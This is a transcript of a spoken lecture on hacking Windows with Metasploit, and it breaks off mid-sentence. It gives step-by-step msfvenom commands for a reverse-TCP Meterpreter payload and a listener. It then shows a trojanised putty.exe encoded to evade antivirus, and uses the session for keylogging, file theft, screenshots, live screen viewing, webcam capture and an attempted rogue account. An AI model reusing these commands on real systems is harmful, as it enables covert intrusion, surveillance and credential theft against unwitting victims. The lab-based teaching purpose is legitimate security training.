Yes. Yeah. So yesterday I have going to started the Windows hacking, how to hack a Windows by using the virus. So before going to started a Windows hacking, we have to first understand what is the Metasploit framework, right? Because with the help of Metasploit framework, we can hack the Windows and some other tools also, but I will tell you later. The first tool is this Metasploit framework. So Metasploit framework is actually a very big tool in the Kali Linux. So Kali Linux has so many tools. So Metasploit framework is one of them, but it's a very large and it's a complete. It's not only the tool, but we call it as a framework. Metasploit framework. Framework means a collection of multiple tools. So multiple collection of multiple hacking tools. It's that's why it's called Metasploit framework. The short form is MS. So it is also known as a MSL. Okay. So I have started my Kali Linux, and as you can see that my IP address is 1.18. Let me take the terminal shell 18 on my Windows terminal so that I can easily access the terminal of Kali Linux. Okay. So let's understand what is the exactly a Metasploit framework. About the Metasploit framework is an open source penetration testing project that helps you to find out system and application vulnerabilities like weakness, and exploit these weak points into the system to find out how to fix it. Metasploit also is used in the footprinting and reconnaissance, network scanning, exploitation, malware development, and the web application attack. So with the Metasploit, we can perform these all tasks. And this is the Metasploit history. So Metasploit was created by H.T. Moore in 2003 by using the Perl language, right? And by 2007, the Metasploit framework had been completely rewritten in the Ruby language. Now, on the October 2009, the Metasploit project announced that it has been acquired by the Rapid7 company, a security company that provides a unified vulnerability management solution, Rapid7. The useful terminology in the Metasploit, which will be used and understand, which is vulnerability. So, what is a vulnerability? Vulnerability is a weakness in the target system, right? A weakness in the target system through which a penetration can successfully occur. An exploit means once a vulnerability is known, an attacker takes advantage of it and breaks into the system using the code and script. And this kind of code and script known as exploit. So vulnerability plus payload is equal to exploit. So if we find out the vulnerability and then we apply the payload, then it means we are doing the exploitation. And what is the payload? Payload is this is a set of tasks initiated by the attacker subsequent to an exploit in order to maintain access to the compromised system. So payload is just like a bullet, right? When you fire a gun, the bullet will come outside of the gun and then uh, trigger a particular person, right? The vulnerable person. So payload is considered just like a bullet. CLI is a command line interface, and GUI is a graphical user interface, and MSF is Metasploit framework. Rapid7 release three types of Metasploit framework tool. Metasploit community version, which is a free version, and it is pre-installed in the Kali Linux. Metasploit Express version, which is comes with some extra things like smart exploitations, password auditing, evidence collection, logging and reporting, replaced. And then the Metasploit Pro. Metasploit Pro will comes with the social engineering, web application scanning, post exploitation, macros, and IDS, IPS evasion, VPN pivoting, team collaboration, tagging, PCI, FISMA reports, enterprises level and export integration, VMware and AWS, EC2 virtualization, assistance, session, and listeners. So of course, Metasploit Pro is more advanced than Metasploit Community. But in our Kali Linux, we have only the free version, which is Metasploit Community version. Next is we can run the Metasploit framework on any operating system, whether it is Linux, Unix, macOS, and the portable Windows with the help of Sigwin. So with the help of Sigwin, we can install Metasploit in our Windows as well. But the preferable and the main recommended is Linux. So Metasploit allow anyone to exploit and usually root certain machines with only IP address and basic background of the system. Required no knowledge of the software bug can exploit machine code. In the Metasploit, we have this is actually architecture of Metasploit framework. So the Metasploit is built by the so many things like modules, plugins, tools, libraries, and interface. In the modules, we have a payload, exploit, encoders, loops, and auxiliaries, and evasion also, right? The tools I have, which is Rex tools, plugins, we have a MSF-based plugins, and they also known as a library. So Rex, MSF Core, and MSF Base, these are the three libraries. And interface, we have console, MSF console, CLI base, web base, and GUI base. Rex is what? So Rex it means support the most of undertaking and incorporates base 64, HTTP, SMB, SSL, and Unicode functions. MSF Core stabilize the Metasploit framework and offer standard API security. And MSF Base offers an available API. Right? Which API is available? So these are the three libraries available in the Metasploit framework. Okay, now what is the vulnerability? A vulnerability is a security hole in the piece of software, hardware, or operating system that provides a potential angle to attack the system. A vulnerability can be as simple as weak password or as complex as buffer overflow or SQL injection vulnerabilities. Vulnerability scanning will allow you to quickly scan the target IP range, looking for known vulnerabilities, giving a penetration tester a quick idea of what attacks might be worth conducting. In the Metasploit, as I already told you, we have a modules, and these are the modules: exploit, payloads, encoders, loops, auxiliaries, evasion, and post. So, what are these modules? The different modules. First of all, we will understand what are the encoders. So, encoders are the raw payload code to evade the detection by antivirus or other defenses. Different encoding algorithms are used like XOR, shuffle, and prepend. These are the different algorithms to hide the virus from the antivirus. Popular encoders, we have Shikataga Nai, which is a very famous, right? Base 64 and the PowerShell base 64. These are the famous encoder, right? Exploit. What is the exploit? Exploit is a program that is used to attack the vulnerability of the target. And there is a large database for exploit on the Metasploit framework. And you can search the database for the exploits and see the information about how they were, the time they were discovered, how effective they are, and so on. Auxiliaries is the exploit is the program. Exploit is the program that is used to attack a vulnerability of the target. I think, oh, I have just copied and pasted the same theory. Let me tell you what is the auxiliary. Auxiliary is just like a program. For those program, with the help of those program, we can perform the scanning, right? We can perform the scanning against the target and then collect the information with the help of auxiliaries, right? So we can see that the NMAP. NMAP is already available in the Metasploit framework. Netcat is also available, and Nikto tool, and so many other tool, which is a scanning related tool, information gathering tool. They all are already available in the auxiliaries. Payload. So in the Metasploit framework, we can create two types of payload. A bind shell. A bind shell is when the target machine opens a port and listen for an incoming connection from the attacker machine. So this is our attacker and this is our victim, right? So attacker is using here, you can see that attacker is using the bind TCP, and in the bind TCP, we are using the victim IP address. Victim IP address is 2.2.2, right? And the victim is listening on 1337 port number, right? So a bind in the bind shell, when we create a bind shell, the attacker always use the victim IP address, right? Which is not good, because if the victim change his network, then the IP address is changed. It means when the IP address is changed, then your payload is wasted, right? So if you want to use a bind TCP, then this is the bind TCP shell. Windows interpreter, Windows slash interpreter slash bind underscore TCP. So this is the payload. So we will use these kind of payload in our attack. Okay, and next one is the reverse shell, bind shell and reverse shell. Reverse shell is simply the reverse. The attacking machine opens a port and the wait for the target machine to connect. And in the most case, for CTFs and exam, you will want to use a reverse shell instead of bind shell, right? So for the reverse shell, the attacker always use Windows interpreter reverse underscore TCP. So in the reverse TCP, attacker always use his own IP address in the payload and then send this payload in the victim computer to run or to execute the virus. So it doesn't matter when the victim will change his network or the internet continuously from home network to office network to uh, cafeteria network or any other Starbucks network, right? It doesn't affect your payload. Your payload is still work. So the advantage of a reverse shell over the bind shell is that the majority of the system firewalls generally do not block the outgoing connections as much as they block the incoming connection. This is the one of the main reason why we need to use a reverse shell instead of a bind shell, right? First one is the network because the victim changed his network, and second one is the firewall because firewall always block incoming packets instead of outgoing packets. Nopes. What is the nopes? So in the assembly code, a nope is a short form for no operation. And this is the most popularly known for x86 chips. X86 chips means 32-bit chips computer. As 0 x90. X 0x90 means no prevent the payload from crashing, right? A set of arbitrary bytes is generated by the node, which is used to bypass the standard IPS, IDS, right? Node sled signature. So node keeps the payload size consistent. The evasion module helps generate a Windows executable exe, which evades the Windows Defender antivirus. And this achieved using various techniques, such as metas, anti-emulation, shellcode encryptions, and source code obfuscation. Source code obfuscation means to hide our source code from the antivirus, right? So, which techniques we have used in the code to bypass the antivirus? So that's why we use the evasion techniques to bypass antivirus. Next is post. What is a post? Metasploit post gather modules are useful after a Metasploit session has opened. It means the attacker use the post after the victim computer will be hacked. right? So when we hack the victim computer, then we can use the post. Before the hacking of the victim computer, we cannot use the post. So this guide focus on the post model for gathering additional information from a host after the Metasploit session has opened. Metasploit session has opened. It means you have hacked a computer, the victim computer, and the MidRepeater session has been open in your family. Now in the Metasploit, we also use some terms like lhost. Lhost means the local host, right? Which means attacker IP address, and lport is a local port, which means attacker port number. And r host means target IP address, and whether it is operating system IP address, website IP address, server IP address, doesn't matter. But our host means the target IP address. And our port means remote port, which is again the target port number. And the target settings and the exploit timeout. Okay, so let me show you the Metasploit. Let me cover this later. Okay, so these are the component of a Metasploit framework we have. First of all, the MSF console is one of them, right? So MSF console is the component of Metasploit framework, and this is the command line interface tool that is used by the Metasploit framework, and it enables you to navigate through all the Metasploit database and easy and use the required module. This is the command that you can enter before get the Metasploit console. So if you want to start a Metasploit framework, you have to run the command MSF console. So when you run the MSF console, which means Metasploit console, Metasploit framework console. So I'm going to starting this. And finally, you can see the Metasploit framework has been started with the banner. So this is called banner, which will change every time, right? And these are the all detail like Metasploit latest version 6.4 development version, and the total exploit in my Metasploit, total auxiliaries, total post, and total payloads, total encoders, total nodes, and total evasion. I have these, right? So we have so many few commands like help command. So with the help of help command, you can change so many things, right? So if you want to change a banner, BANNER, banner. So your banner will be changed. So now your banner is this. So this is your banner. If you execute one more time now, this is the another banner. This is the another banner, right? The introduction screen. So with the help of MSF, MSF is a Metasploit framework version 6. So with this MSF console, we can start a listener. Okay, we can start a listener. Let me first. So one more thing in this Metasploit framework, we have a search command. So with the help of search command, you can search the specific thing like exploit. So if I say XPLOI, exploits, so it will give you all the exploit list. Total exploit I have 4,436. If I say uh, evasion, then total evasion I have 12. These are the total evasions. Now I'm say nopes. These are the total nopes. And payload, how many payload I have? Total I have a 2,794 payloads I have for the different purpose. Okay. And if you want to search the specific software, specific vulnerability name, specific service name, like if I say search SSH, So it will give you the all SSH related payload and so and exploit and loops, everything. They all are belongs to the SSH. If I say FTP, so it is all related to the FTP. If I say A and D are the Android, so it will give you all the Android related things, right? Is there Mac OS also available? So yes, Mac for the Mac OS, it is also available. For Windows, yes, for the Windows is also available. So this is the one of the main tool. Let me exit. Next one is the MSF Venom. MSF Venom is also a part of Metasploit framework, and this is the tool which helps you to create your own payloads. Payload is just like a venom, venoms to inject in your victim machine, right? So this is the important since your payload might get detected as a threat and get detected by threat detection software such as antivirus or anti-malware. So with the help of MSF Venom, we can create our virus, our payload, right? For antivirus, it is virus, but for me, it is a payload, right? So there is no difference between the virus and the payload, right? For the hackers, hackers use the technical terms payload, but normal people use non-technical terms like virus. This is the malware, this is the virus, this is the worms, but it is actually a payload for me and for you also. So Metasploit framework basic commands we have like banner command I have told you, color command, version command, show command, use command, back command, search command, set, quit. So rest of the command I will cover one by one. Okay. Okay. Third part is that the meterpreter shell. Meterpreter shell. Shell is what? Command. So this is the third component of the Metasploit framework, meterpreter. Meterpreter is an advanced payload that has a lot of functionality built into it. It communicates using encrypted packets. Furthermore, meterpreter is quite difficult to trace and locate once in the system. It can capture a screenshot, dump password hashes, and many more tasks he can perform. So you can grab this meterpreter shell once your victim computer is hacked. If the victim computer is not hacked, then you cannot access the meterpreter shell. And this is the main location of the Metasploit framework tool. Ls, let me go inside it. User, share, and then Metasploit framework. So in the Metasploit framework, we have so many things like database DB modules, right? Libraries, plugins, script, and then tools, and so many things. So let me go inside modules. So we have a different modules, auxiliaries, encoder, evasion, exploit, nodes, payload, host, right? And if you want to go inside Okay, sorry for the internet connection issues. So I have changed and switched my internet connection. Now let me check my new IP address. Okay, so now this is my new IP address 192.168, 170.160. Okay, 168, 117 or 160. Okay, so this is the location of the Metasploit framework. You can check everything like plugins, modules, and so on. And these are the some commands. Well, in the Metasploit framework, we have a lot of commands, but these are the some important commands that interact with the session. So session hyphen I and then session ID. And then if you want to kill a session, then session hyphen K and the session number. So we will get the session after the interpreter, right? So before going to understand the interpreter, we need to first hack a Windows system. Okay, so Metasploit framework basics I have covered, but the practical I will show you in this the previous module, which is system hacking again. So let me start my Windows 10. Okay. I have installed my Windows 10, which I have downloaded from the Google Drive, which I have also shared with you. And after installing this Windows 10 or after set up the Windows 10, make sure you have to first create a backup, the snapshot. Just like my Windows 10 snapshot is already created because I wanted to I'm going to hack my Windows. So maybe it will create some problem. So I wanted to create a backup for that. So I have already created a backup. So let me show you how to create backup. It's like Metasploitable. This is the machine. So just click here and then click on the snapshot and I'll click on the take snapshot and just click on the OK button. So when you click on the OK button, your um, uh, your your snapshot will be created. Like let me click on the OK. So you can see the Metasploitable machine snapshot is created. So this is the current state and this is the backup, right? So let's consider in the current state, if you deleted a lots of files of the operating system, right? If you destroyed your operating system in the current state, then you can just turn off your machine, right? Power off your machine, and then come here and then just select this and then click to restore. So everything will be set as it is recovered. And if you want to remove this, the backup or the snapshot, then just click and delete the snapshot. Finish. So I have already created the snapshot of my Windows 10. Okay. So now I can do whatever I want in this window. So this will not destroy. Let me start my Windows 10 machine. So just for the network connection, you have to click on yes. And now in your Windows, the network connection will be activated. So you have to just wait for the connection here. You can see that. Wait. Okay, no problem. So it will be definitely, it will provide you the internet connection. Let's come here again. So here is from here, I will go to start the Windows hacking using the Metasploit framework. So Metasploit framework basics and the theory we have already covered. Now it's all about the practical, right? How to understand the Metasploit framework with the practical also. So to start, to hack any Windows operating system, and doesn't matter whether it is a Windows 7, Windows 10, or Windows 11, right? So we will hack our Windows. So I have already installed the victim machine, Windows 10, in my VirtualBox. So I'm going to hack my Windows 10 machine by using the Metasploit framework. So before hacking any machine, first we need to create a uh, virus or the payload. You can call him anything like payload or the virus. So first we need to create a payload for our machine, for our victim machine. So I have a machine here. You can see that. So to create a virus for the machine, first you have to and make sure. Uh, yeah, okay. MSF Venom. So as I already told you that MSF Venom is the Metasploit framework component, and by using this, we can create a virus or the payload, right? So MSF Venom tool hyphen P for payload name. So what is the payload which you want to use? Windows slash meter slash reverse underscore TCP is the payload name. Okay. And the L host, what is the L host? L host is 192.168.1117.160, I think. Let me check my L host 1117.160. So this is my attacker machine, my machine IP address, attacker, Kali Linux IP address. And then L port I will use a 444 port number. So we have to use a port number 444 or any other port number if you want, right? But make sure do not use the well-known port number. The famous port number do not use. Only use some temporary port number which is not used by the Windows machine. L port is done, and after that -F for format. Format is exe file. Virus format is exe. -A is the architecture, and architecture I wanted to use x86. X86 means the exe file should be a 32-bit architecture, right? Because maybe the victim computer is 32-bit architecture. If we created the 64-bit architecture virus, then the 64-bit architecture virus will not execute in the 32-bit operating system. So that's why always create a 32-bit architecture virus on the payload. So let's put the name payload.exe. So you can change here anything like virus.exe, payload.exe, payload1.exe, payload2.exe, payload3.exe, anything you can put the name here. Let me hit enter and just wait. So it will take some time to create this payload. And in the Windows machine, in the victim machine, the internet connection is working. And let's check the IP config IP address. So my Windows machine IP address is 117.207. It doesn't matter. But make sure both the machine, Kali Linux and the Windows 10 is in the same network. So you can see that the payload has been created, the virus has been done. You can see that payload.exe is created successfully. Okay, and after that, you have to you have to let's take another terminal because we need a two terminal at a time. So let me first okay, let me download this. Sorry, my mistake. Let me start the MSF console. So MSF console you have to start, which means the listener. The listener you have to start. Okay. Okay. So MSF console has been started. Now use exploit multi handler, right? And then now check options. In the options, you have to change this and set here the IP address, and the port number is already set. So we don't need to change. So set, first of all, set payload. Payload is which payload? So just copy the payload from here and use this payload as it is in the multi-handler. Done. Now set L host because he is asking for the L host, which means attacker IP address. So what is the attacker IP address? 192.168, sorry, 192.168.1 17.160 is the attacker IP address. Now check again option command. And now you can see the payload is set, IP address set, port number set, everything is set. Now you have to just you have to run the command exploit. So when you run the command exploit, now he is waiting for the connection, right? So he is waiting that the victim will install my virus, and then I will hack the victim computer. Okay, so okay, so let me form one thing. Instead of hacking my Windows 10, let me hack my Windows 11. Okay, so the virus is already created. We need to just we can send this virus anywhere. The computer will hack by just sending the virus value. Okay, so I have already created the virus and the listener is already waiting, right? So let me transfer this payload.exe in my Windows 11. Okay, so let me, but because my Windows 11 has an antivirus, right? So let me first of all, let me turn off my antivirus, real-time protection turn off. So I have a turn off my antivirus so that my virus, when I transfer the virus in my Windows 11, will not be caught by the antivirus. Close this. How to transfer this virus in the Windows 11 machine? So let me start here the Python HTTP server with port number 80 and open the browser in Windows 11 and access the Kali Linux IP address and then download the virus payload.exe. So download again, open the folder, and you can see that the payload.exe is here. Close this. Okay, and close this one also. And he is waiting. Okay, in the terminal, he is waiting. So when I execute this command, when I run this virus, automatically the connection will be received by the handler. The Linux will receive the connection. So let me open this virus, right click and open. Then now check your terminal. Now you can see that MeterPeter session 1 open. It means my Windows 11 computer is hacked by the Kali Linux. But by just only single virus transfer and the victim by mistakenly click on the virus and then their computer is hacked, right? So after the hacking of the computer, you will receive the MeterPeter session. right? Meterpreter session or the meterpreter shell, doesn't matter what you called him. So meterpreter shell I have received. So meterpreter shell also have their own personal commands. Like when you run the help command, right? This is the help command. So there is a lots of command in that, right? So first of all, let me perform some basic commands like some basic commands is one of them. Let's start the keylogger in the victim computer, right? So whatever the victim is typing through the keyboard, the the Linux hacker can easily capture everything. So how to do this? Simple. First of all, you have to the attacker will perform the PS command. PS in the PS command we can see the head computer running process, right? So you can also run the commands sys uh, sys tm system, sorry, sysinfo command. So when you run the sysinfo command, it will tell you that which computer I have hacked. So Windows 11 computer I have hacked, right? And it's a 64-bit operating system. Meter session is 32-bit. Done. And get UID. This is the username of the computer, KSHAM. This is my username, right? And and when you run the ls command, you will see the hacked computer direct location. So where is that virus I have transferred? The virus is visible and the personal data. So right now I am inside this location in the victim computer C drive, program folder location, right? Now let me perform the Metasploit keylogger. So after running the PS command, you will see that you have to notice here there is a explorer.exe. Where is the explorer? Explorer.exe is not visible. Yeah, here is the explorer.exe. Look at that. So here is the explorer.exe, and this is the process ID, PID, and this is the parent process ID. So we need to only focus on the process ID. So copy this process ID of the explorer.exe, copy, and then just run this command, which is migrate. So mig migrate, and just copy paste the process ID and done. Done. After that, uh, then we have to, yeah, then we have to after get PID. We can run the command get PID to check which PID, which process ID is migrated. So I have a migrated 8756 process ID. After that, now just start the key scan start. Key scan STA start. So key scan start, which means the keylogger has been started, right? Now, whatever the user will now the let's now the victim is opening his notepad. And now the victim is typing in the notepad about password is ASD123, right? My Facebook username is Mr. Sam 404. So this is the crucial information the victim is typing in anywhere. Doesn't matter whether he's typing on the browser, whether he's trying to log in the browser, but he's typing through the keyboard. So through the keyboard, everything is recorded by the attacker. Now close this. Now let's check key scan. key scan, and then just run the command key scan dump. And look at that. Whatever the victim is typed through the keyboard, everything is recorded. So in my Windows 11, whatever I'm typing, everything is recorded by the Kali Linux, the Metasploit framework. So this is the keylogger is running in the background. That's why. So if you want to stop this keylogger, just run the command stop, stop. So key scan stop. So now the key scan is stopped completely. Now next command is download and upload command. Yeah, there is so many commands like cat command, cd command, copy, cut, dir, download, upload, mkdir. We can delete file, we can create directly in the victim computer. So let's perform some of the basic commands like uh, when I run the ls, it will give the content of the victim computer, right? Ls command. You can see that the DLL file. DLL file is visible. Check the PWD. So when I check the PWD, you can see the right now I'm in the location of system32. That's why these files are visible. Let's go inside. So, sorry. cd dot dot cd dot dot. And now check again the PWD. So right now I'm in the C drive. Look at that. So I am in the victim, I'm in the Windows 11 C drive. Let's go inside our users folder, PWD. Okay, now check ls command. Now go inside any folder like cd and then ksham folder. And now check ls. So now in this, now I'm in that. Now you can select any folder like cd music. Is the music folder is available? Yes. So cd and then music music. And now I'm inside the music folder. And in the music folder, there is only single file. Okay, so now here I will perform everything. Like what? LLS. When I run the LLS command, so it is giving my Kali Linux data, right, in the current location. So I have in my Kali Linux, I have a secret.txt file. So I wanted to transfer this secret.txt file from my Kali Linux to victim computer, which is Windows 11. So I will say that upload, copy and paste. Done. So you can see that the secret.txt is transferred in the Windows 11. So we can see that from here in the music folder, you will see that the secret.txt is transferred from the Kali Linux. So hacker is uploaded here the file. Same as well as I can download any file in my Kali Linux. So in my current location, there is only a normal file. Let me go back. So here there is a lots of files. Let me download the ngrock.exe file in my Kali Linux. So hacker wants to download a file. So DOWN download, just copy paste and hit enter. Now you can see I am downloading the ngrock.exe file from Windows to Kali Linux. So hacker can download your data, hacker can upload anything in your system, everything he can perform. Now check LLS. So when I run the LLS, so in my Kali Linux, the ngrock.exe is visible, right? Look at that. Ngrock.exe is visible. So this file I have downloaded from victim computer. Okay, next thing is another command, help command. So the another command, there is a lots of command actually. So I'm just telling you some basic command and famous. Sysinfo command is can be done screen share. Yeah. So let me take a screenshot of the victim computer. So SCREE and screenshot. Okay, so this is the victim computer, right? Screenshot. So when I hit enter, screenshot command, you can see the screenshot has been taken and captured and saved inside the Kali Linux location. So do you want to see the screenshot of the victim Windows 11 machine? So just open this, and here you can see here is the screenshot of victim machine. So this is the exact screenshot of my Windows 11. Do you understand? Let me close this. So this command is done. Now the next command I also have, which is screen share command. So when I run this screen share command, it will show me all the live monitoring of the live video monitoring of the victim computer. What the victim is performing, what are the victim is doing in his computer, everything I can see live. When I run the screen share command, there is a HTML file is generated and saved inside this location. So you have to go inside the Kali Linux and open this HTML file in the browser. So when I open this in the browser, you can see that, yeah, right. So this is called a live monitoring. So it's a live monitoring is running, right? If I change another location like C drive, then look at that, the live. If I go inside, let me do this, right? So if I go inside the picture folder, look at that. Whatever the victim is performing in his visible to the hacker, right? Whether he's watching any photos, any videos, whether he's reading any document, a secret document, everything is visible on the victim browser. So this is just like a live CCTV. Okay, so let me close this. Close this. Yeah. Next command, HELP help. So screen share, screenshot done. Next thing is the webcam command. So we can check the webcam. Yeah. So webcam underscore list. So we can check the webcam. How many webcams are available in the victim computer? So it is saying there is a one camera which is integrated camera. We'll be covering hacking server by bypassing the firewall and the virus scanner. Virus scanner. Yes. The bypassing the firewall, uh, we can perform the as I when I was teaching you the NNet, right? If you remember, I have shown you how to bypass the firewall of Windows 11 machine or any other doesn't matter any machine. But in the machine, if the machine is using the firewall to protect any service, I have already shown you how to bypass the particular service and port number. You can check in my previous video, the scanning related video, NF. So by using the webcam list, we can see the webcam. Okay, so there is a webcam is visible. Yes, there is a one webcam. Okay, now I'm saying that webcam list and then webcam snap. So take a snapshot from the specific webcam. Okay, from the specific webcam. So I'm saying that webcam snap. I'm saying webcam snap one, which means there is only one webcam now. That's why I have to provide the particular number. So my webcam is already open and I'm in the my room light is not on, but maybe my hand will show you. So let me hit enter. Yeah. So there is a picture has been saved. I clicking on the webcam. So let me show you the picture which is clicked by the webcam. So which picture is this? I think this one. Is there anything visible in that? I don't think it's completely okay. Let me take another picture. Delete this one, this one. Okay, let me put the lights on the. Let me do one more time. Webcam snap. Got failed. Yeah. Now check again. So yeah. So I have used my phone, mobile phone screen in front of the camera so that we can understand the webcam is working. So yes, right. So this is the live webcam photos. So I have used the Android phone in my camera so that you cannot see my face, but the webcam is snapped. Okay. One more thing is that webcam is working. There's one more thing is that webcam streaming, play a video streaming from the specific webcam. Okay, is it work or not? Let's see webcam stream. Okay, so that is particular. I have to use. So I have started the webcam streaming live, and there is a IPv QWPM type of file is generated. So we have to open this file. Another file is this. Yeah, you can see that there is a picture which is a live picture, right? So when I open this picture, look at that. So it's a live, right? Can you see this? So there is no buffering in that. So this is called a live, the control C. Yeah. Okay. So we have. After that, you can also play a sound in the victim computer, like any horror sound you can play in the victim computer. And get system command is to check the elevate command. Do you have a proper permissions or not? Okay, so this is the main thing actually, because if you perform the hash dump command is used to dump the database of a SAM database, which means the Windows user password in the in the hash format. So when I perform the hash dump, it will not work. Why? I will tell you later why. And there is another command in the interpreter shell, which is called shell command. By using the shell command, you can access the victim computer C drive access. So you can access the all data, right? You can modify, you can create directory, you can delete anything. But when you run the who am I command, you will see that you are just a normal user, right? You are just a normal user, which is a KSHM. the normal user. So you don't have a permissions actually. You have permissions, but you don't have a too much permissions. You cannot perform the elevated task, right? You cannot perform the elevated task. Just like if you try to add a new user, net user, and then I wanted to add a new user in this victim computer. So this is the command, and hacker, and the password is ASD, and then /add. So when I perform this command, that I wanted to add a new user in the victim computer without informing the victim. So when I hit enter, it is say access denied, right? So I have a hacked the victim computer, but I don't have a too much permissions. I have only few permissions, and with the few permissions, I cannot perform every task, right? Which means this particular shell is not important for me. Only for the few small performance you can perform. So let me exit. Then, so how would you verify? So first of all, you have to run the get privilege command, which will show you that how many permissions you have. Okay, so you have only five permissions. Next, get is to convert yourself from normal user to admin. But when I run this command, I have not converted, right? Because I have not bypassed the USC. USC is the security feature in the Windows, right? So we have to bypass the USC to perform the elevated task. So that because I have hacked my Windows 11, but I don't know in my Windows 11 how can I elevate this because it's a Windows 11 latest security, right? So maybe there is no vulnerability, there is no weakness in my Windows 11. So the rest of the part I will continue with Windows 10. Okay, because I wanted to show you only the webcam access and other things. That's why I have had my own Windows 11. But the rest of the other practicals we will use a Windows 10 VirtualBox based. Okay, so let me cancel this program. Uh, okay, one more thing. There is an interpreter session. So if you want to hack another computer, then just use background command, right? So your session is running in the background and your terminal is free. By using this free terminal, you can hack another computer. Okay, and you can check is your session active or dead. So you can see the session is active, and ID number is 1. So if you want to again access this session, then you have to use session -I and ID number 1. And now you are again in the Metaplex session. Again, let's run background check session. Now to kill this session, if you want to close this session, then you can run the command -K, K for kill ID number 1. And now you can see the Metaplex session 1 closed. Now try again and check, is there any session remaining? No, there is no session, no active sessions. Okay. So, so let me delete this virus which I have downloaded in my Windows 11. Okay, delete. So my Windows 11 is free. And let's transfer this virus in Windows 10 machine. So how can I transfer? Yeah, so I can transfer IP address is this, and I can use the infect server, but I have to, because I'm sharing a music folder, so I have to transfer this payload.exe inside a music folder, and then I can apply, sorry, and then I can apply this and touch SMB share music folder. Now open the IP address of Kali Linux in the victim computer. 117.160. Hit enter. and here is you can access, and here is your virus. Copy this virus and transfer in the desktop. Done. Simple and easy. Now cancel this process. Server, cancel this server. Okay, so okay, one more time you have to, you don't need to do anything. Okay, just clear the screen by using the control K, and just run the same command again. Okay, no need to change. Exploit. Yeah, so he is waiting. Now just right click on the virus and open. So when you open the virus, you will see that again the session open to open. It means now this time you have hacked your Windows 10 machine. Okay. So again, if you try this shell command and check who am I, definitely you are not a admin user. You are just a normal user. Okay. If you tried, sorry, exit command. So if you tried get privilege command also, you will see that you have only 5 permissions. And if you tried get UID, you can also see the normal user, get SYS, get system, which will provide you the authenticity, the authority, but it gives you the error because you have had only the normal system, normal user, and you did not bypass the UAC. UAC is what? UAC is the security. So this is the first method, that how we can hack any Windows. Now the second thing is that how to bind any payload in the any original software, right? Well, it's a when we talk about this kind of a payload, this payload is a completely a fresh payload, right? Any antivirus can easily catch this virus, right? Easily delete this virus, easily kill this service because it's a pure virus, not that's right. So you have to hide your virus inside any kind of software, like Firefox software, inside a Kernel software. You can hide in any other type of softwares. So it is easy to hide this virus from the antivirus. How can we perform this? So simply let me exit hyphen y. So when you run this command exit hyphen y, it is also close the session number. Done. So now let's create an combined create virus, but with the combined some kind of original software. So this is the putty.exe software, which is famous. So I can use this software. Sorry. So let me download this original software putty.exe in my Kali Linux. Double that, and let me delete the rest of the other files, HTML files. JPEG. Okay, so wget putty.exe file. So download this original software. What happened? This URL, cancel this, Control C, copy paste, and download. I think it is not downloading in the Kali through the CLI. No problem. We can directly download in the Kali Linux through the browser. Through the browser, let's download this file. So you can see that putty.exe has been downloaded successfully. Done. Now close this software, and here is the putty.exe software. Okay, done. So now we will use the MSF Venom command again to create a new virus, but with a combination of putty.exe. So I'm going to merge my virus, right? Combine my virus with this software. So let's run this command. MSF Venom -A for architecture. Architecture is 32-bit x86, and hyphen other platform Windows -X for putty.exe. Okay, number 3. I have to copy the putty from the download folder putty.exe and copy outside, and then MSF Venom -A. Yeah. So let's for putty.exe -K and payload is this host. Yeah. So we have to change the IP address in that host. Port number we will use now. I will use the port number 555. Okay. One 67 and 168. Yeah, the rest of the things are same. And -E for encoder. As I already told you, the best encoder is Sikataganai, right? And then -B for NOPS. Here I'm using the NOPS. /X00 is a bad character, so it will remove the bad character. And -exe and the payload and the virus name is a payload2.exe, because the payload.exe is already we have it generated. This is the payload2.exe. So let's download this. Oh, sorry, let's generate this virus. Okay. Finally, you can see the payload2.exe is generating. Okay, so and your handler is already ready. You have to change some things like a port number you have to change. So set L port 555. Done. Rest of the things are as it is same. So just exploit the command, run. So he's waiting, and let's transfer this payload2.exe file. How do you transfer this payload2.exe file? So simple. Copy this payload2.exe in the music folder, and then start the SMB server and share this music folder in the network so that everyone can access. So just copy this payload2.exe and paste out on the desktop. So look at that. There's a big difference in these virus. Payload.exe look like this, and payload2.exe look like this. So this is look like some kind of a genuine software, right? This is some kind of a genuine application. Yeah. When the victim will open this genuine software, you can see that the software is running. It's a putty configuration, and the victim is using this software, of course, but the victim don't know that in the background the virus is running. So when the victim is opened this application of this virus, in the background the Meterpreter session has been created. So victim computer is hacked, and then victim don't know about this, that my computer is hacked just by opening this simple software, which is a genuine, which is look like a genuine software. Okay, so this is the by merging, how to merge a virus in the original software. If you try this also, get SYS, get system. So this will also not giving you the any kind of administrative privileges, right? Which means again we did not bypass the UAC. No problem. Next thing is, but understand what is the UAC, why we are not practicing. UAC is a security feature in Windows, right? User account control, UAC, user account control, and it's a Windows security feature that force any new process to run in the security context of a non-privileged account by default. So this policy applies to process started by any user, including the administrator themselves. The idea is that we can't solely rely on the user identity to determine if someone action should be authorized. Although this may seem counterintuitive, imagine the case where user Bob unknowingly download a malicious application from the internet, and if the Bob is a part of the administrator's group, any application he launch will inherit its access token privileges. So if a Bob decide to launch the malicious application and UAC is disabled, let's consider if the UAC is disabled, the malicious application would gain administrative privileges instantly. Instead, the malicious application will be restricted to non-administrative access token when the UAC is in. So in my case, I can also disable the UAC, right? Like antivirus. But every time I cannot do this now. Because antivirus, I know that we can disable the antivirus because the antivirus has some kind of a genuine reason, right? Because to bypassing the antivirus is some different kind of techniques, right? We have to, if you want to bypass, you have to be a coding knowledge, and not a basic knowledge. You have to be advanced coding knowledge. Then you can bypass the antivirus. But bypassing the UAC is easy, right? So I will use the UAC elevation, how the UAC elevation work, elevation with bypassing. If an administrator is required to perform the privilege task, the UAC provide a way to elevate privileges. Elevation works by presenting a simple dialog box like this to user and confirm that the explicitly approved running application is administrative security context or not. So if you are running this and suddenly this opened in front of you, and you know that you didn't open this, then just click on the no button. Because if you are not opened this CMD, then why are you click on the yes button? If I click on them like CMD, let's consider suddenly this screen is comes in front of me. And I don't know why is this coming in front of me, because someone is trying to take access of your computer. So just click on the no button. If you want, then you can just right click and just click on that yes. Then your system, then your terminal is under this administrator group, which means now this terminal can perform any kind of task. So there is an integrity labels in that. UAC is a mandatory integrity label control, MIC, which is a mechanism that allows a differentiating users, process, and resource by assigning integrity label, IL, to each of them. In general terms, users or process will higher IL access token will be able to access a resource with a lower or equal IL. IL is integrity level. MIC takes precedence over regular Windows DACL permissions. So you may be authorized to access a resource according to the DACL, but it won't matter if your IL isn't high enough. So integrity levels, we have four types: low integrity levels, medium integrity level, high integrity level, and system integrity level. Low for generally used for interaction with the internet, which means for the guest users, guest user account. Medium integrity level is used and used by the normal accounts, which is like the Sam 